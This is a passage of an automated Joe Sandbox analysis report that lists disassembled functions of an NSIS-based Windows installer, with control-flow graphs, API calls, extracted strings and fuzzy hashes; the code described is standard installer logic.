                                                                                                                                                  • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                  • String ID: @rD
                                                                                                                                                  • API String ID: 3282139019-3814967855
                                                                                                                                                  • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                                                                  • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                                                                  • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                                                                  • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                                                                                                  Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                                                                                                  APIs
                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                  • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                  • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                  • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                  • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                  • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                  Strings
                                                                                                                                                  • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                  • detailprint: %s, xrefs: 00401679
                                                                                                                                                  • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                  • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                  • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                  • Call: %d, xrefs: 0040165A
                                                                                                                                                  • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                  • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                  • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                  • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                  • Rename: %s, xrefs: 004018F8
                                                                                                                                                  • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                  • BringToFront, xrefs: 004016BD
                                                                                                                                                  • Sleep(%d), xrefs: 0040169D
                                                                                                                                                  • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                  • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                  • Jump: %d, xrefs: 00401602
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                  • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                  • API String ID: 2872004960-3619442763
                                                                                                                                                  • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                  • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                                                                  • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                  • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                                                                                                  Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                    • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                    • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                  • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                                                                                  • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                                                                  • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                                                                  • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                                                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                                                                  • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                                                                  • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                                                                    • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                                                                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                                                                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                                                                  • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                  • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                  • API String ID: 608394941-1650083594
                                                                                                                                                  • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                                                                  • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                                                                                  • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                                                                  • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                                                                                                  Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,142,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,142,142,00000000,00000000,142,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                  • String ID: 142$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                                                                  • API String ID: 4286501637-2428566636
                                                                                                                                                  • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                                                                                                  • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                                                                  • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                                                                                                  • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                                                                                                  Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                                                                                                                  APIs
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403598
                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                                                                    • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                    • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                                                                  Strings
                                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                                                                  • Inst, xrefs: 0040366C
                                                                                                                                                  • Null, xrefs: 0040367E
                                                                                                                                                  • soft, xrefs: 00403675
                                                                                                                                                  • Error launching installer, xrefs: 004035D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                  • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                  • API String ID: 4283519449-527102705
                                                                                                                                                  • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                  • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                                                                                  • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                  • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                                                                                                  Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                                                                                                                  APIs
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403464
